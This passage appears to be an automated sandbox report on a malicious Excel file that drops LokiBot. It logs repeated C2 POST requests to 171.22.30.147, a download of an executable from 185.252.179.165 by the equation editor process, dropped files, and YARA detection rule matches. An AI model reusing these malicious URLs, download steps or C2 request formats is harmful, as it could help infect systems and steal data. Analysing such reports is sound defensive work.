Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 149Connection: close
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640505 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03640505
Source: Joe Sandbox View ASN Name: LVLT-10753US LVLT-10753US
Source: Joe Sandbox View IP Address: 171.22.30.147 171.22.30.147
Source: EQNEDT32.EXE, 00000002.00000003.1065602764.00000000005B1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.1065602764.0000000000571000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000002.1246336093.0000000000697000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1242959384.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1246040023.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1245936757.0000000000694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exe
Source: EQNEDT32.EXE, 0000000C.00000002.1246336093.0000000000697000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1246040023.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1245936757.0000000000694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exe$
Source: EQNEDT32.EXE, 0000000C.00000003.1242959384.00000000006E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exeC:
Source: EQNEDT32.EXE, 00000002.00000002.1069342874.0000000000571000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.1065602764.0000000000571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exeT
Source: EQNEDT32.EXE, 00000002.00000002.1069342874.0000000000571000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.1065602764.0000000000571000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exeU
Source: EQNEDT32.EXE, 00000002.00000002.1070068868.0000000003640000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000002.1246831626.0000000003590000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exej
Source: EQNEDT32.EXE, 00000002.00000003.1065602764.0000000000583000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.1069342874.0000000000583000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000002.1246336093.0000000000697000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1246040023.0000000000696000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 0000000C.00000003.1245936757.0000000000694000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exejjC:
Source: EQNEDT32.EXE, 00000002.00000003.1065602764.00000000005B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.252.179.165/Desktop/dwmfs.exetC:
Source: IBM_Centosie.exe, IBM_Centosie.exe, 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, IBM_Centosie.exe, 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, IBM_Centosie.exe, 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.ibsensoftware.com/
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4ACE1A76.emf Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03640505 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_03640505
Source: global traffic HTTP traffic detected: GET /Desktop/dwmfs.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.252.179.165Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: unknown TCP traffic detected without corresponding DNS query: 185.252.179.165
Source: EQNEDT32.EXE, 00000002.00000002.1069342874.000000000055C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comZ& equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.1069342874.000000000055C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: unknown HTTP traffic detected: POST /mous/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 171.22.30.147Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: BDC1654Content-Length: 176Connection: close

System Summary

barindex
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.3.IBM_Centosie.exe.730000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.IBM_Centosie.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.IBM_Centosie.exe.260e67.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.3.IBM_Centosie.exe.730000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
Source: 5.2.IBM_Centosie.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1285971294.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.1286017470.0000000000260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000003.1222991792.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
Source: 00000005.00000002.1286212180.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: IBM_Centosie.exe PID: 2644, type: MEMORYSTR Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Screenshot number: 4 Screenshot OCR: document is protected jig 1"\ Op"" 'he g xwmtm h H$ dcKWMn: CKKC mo hooq enoumc MKmr cr . , ,, , ,
Source: Screenshot number: 12 Screenshot OCR: document is protected jig 1"\ Op"" 'he g xwmtm h H$ dcKWMn: CKKC mo hooq enoumc MKmr cr . , ,, , ,
Source: Document image extraction number: 0 Screenshot OCR: document is protected (D Open the ckkumerk h Mkmtcok OfEcF Phenevmq onlne b 2 m m'ldde hr pro:
Source: MV_TRANS-ASIA_I.xls OLE: Microsoft Word 2007+
Source: ~WRF{9E2CC624-EAF0-4813-82C9-76A9DA993D34}.tmp.6.dr OLE: Microsoft Excel 2007+
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dwmfs[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_0040549C 5_2_0040549C
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_004029D4 5_2_004029D4
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00262C3B 5_2_00262C3B
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 5_2_00265703 5_2_00265703
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Code function: 14_2_00406A59 14_2_00406A59
Source: 819E.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~WRF{9E2CC624-EAF0-4813-82C9-76A9DA993D34}.tmp.6.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Memory allocated: 77620000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\IBM_Centosie.exe Memory allocated: 77740000 page execute and read and write
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 5.2.IBM_Centosie.exe.260e67.0.unpack, type: UNPACKEDPE Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
